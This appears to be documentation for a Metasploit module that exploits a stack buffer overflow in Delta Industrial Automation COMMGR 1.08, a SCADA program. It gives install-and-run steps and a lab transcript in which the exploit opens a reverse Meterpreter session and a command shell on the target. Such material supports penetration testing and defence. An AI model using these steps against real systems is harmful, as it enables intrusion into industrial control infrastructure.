## Vulnerable Application

Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code.

This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1.

The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.

## Verification Steps

1. Install Delta Industrial Automation COMMGR 1.08
2. Start ```msfconsole```
3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
4. Do ```set RHOST ```
5. Do ```run```
6. You should get a shell. :)

## Scenarios

### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1

```
msf > use exploit/windows/scada/delta_ia_commgr_bof
msf exploit(windows/scada/delta_ia_commgr_bof) > show options

Module options (exploit/windows/scada/delta_ia_commgr_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  502              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   COMMGR 1.08 / Windows Universal


msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
RHOST => 192.168.3.64
msf exploit(windows/scada/delta_ia_commgr_bof) > run

[*] Started reverse TCP handler on 192.168.3.150:4444
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.3.64
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700

meterpreter > sysinfo
Computer        : TEST01
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 932 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit
msf exploit(windows/scada/delta_ia_commgr_bof) >
```